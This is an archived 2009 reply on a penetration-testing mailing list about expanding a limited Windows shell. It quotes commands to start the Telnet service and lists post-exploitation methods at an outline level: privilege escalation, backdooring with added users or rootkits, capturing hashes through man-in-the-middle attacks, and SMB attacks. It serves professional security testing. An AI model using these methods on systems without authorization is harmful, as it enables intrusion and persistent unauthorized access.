Penetration Testing mailing list archives
Re: clue on shell
From: ArcSighter Elite <arcsighter () gmail com>
Date: Wed, 07 Jan 2009 10:43:55 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Joshua Gimer wrote:
On Mon, Jan 5, 2009 at 11:59 AM, Ricardo Mourato <ricardomcm () gmail com> wrote:i've got a shell, but it is very limited, i'm trying to upload some programs, in order to get a better shell and get admin rightsYou could also start the telnet service: sc start TlntSvr or net start TlntSvr Just be careful when performing your tests that you do not weaken the security posture of then system too much, the point is to determine high risk areas not create them.
I think Windows Server 2003 improved the security of tftp and other dangerous services (at least in its access control). I say it over and over again, a real pen-tester must know about post-exploitation techniques. I think this post is not getting anywhere, they're many ways. The interesting fact is that they're hundreds of papers discussing the issue, so I don't know why he doesn't have a clue about it. However, in the meantime, I know windows it's very poor on its default configuration for post-exploitation (comparing to a "unsecured" unix flavor which at least has perl in most cases), but as far as I know, if you got a shell you got root in most cases. I normally let people google, but today I'll try something different. If you got a shell, then you have to provide us with the level of access you've adquired, if it's the default then you won't be SYSTEM, but you need to tell us. Privilege Scalation, well, many ways, for example, you could abuse ACLs of services or custom apps or give a try to anything similar to uninformed's w32k.sys privilege escalation. Post-exp (the list is far from complete, do the research): 1. executable uploading (debug, scr, vbs, hex dump, client-side scripting). 2. another web vuln (remote include, etc.) 3. privilege escalation (rev2self, win acls, vuln installed software, w32k-like privilege escalation exploit). 4. backdooring (adduser, trojan-horsing, rootkits) 5. host trusts abusing. 6. enabled easy-filesharing abuse. 7. mitm attacks seeking for privileged services network traffic (hashes, etc.). 8. smb-world attacks. Give a try, as I said the list is far from complete, is a mind-flash, but I think any of those 8 points will help you achieving your goal. Honestly. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFJZM23H+KgkfcIQ8cRAk5zAKCMpRmDT6oVY3zEqPfEb5REykUVwACfYO4T QK0KFfE0n0o7aYGfUUmblAQ= =lzCX -----END PGP SIGNATURE-----
Current thread:
- clue on shell Ricardo Mourato (Jan 05)
- Re: clue on shell Robin Wood (Jan 06)
- Re: clue on shell ArcSighter Elite (Jan 06)
- Re: clue on shell Ricardo Mourato (Jan 06)
- Re: clue on shell Robin Wood (Jan 06)
- Re: clue on shell Christophe Kiciak (Jan 06)
- Re: clue on shell rajat swarup (Jan 06)
- Re: clue on shell Joshua Gimer (Jan 07)
- Re: clue on shell ArcSighter Elite (Jan 08)
- Re: clue on shell NeZa (Jan 08)
- Message not available
- Re: clue on shell Anthony Cicalla (Jan 09)
- Re: clue on shell Robin Wood (Jan 06)
- Re: clue on shell Anthony Cicalla (Jan 09)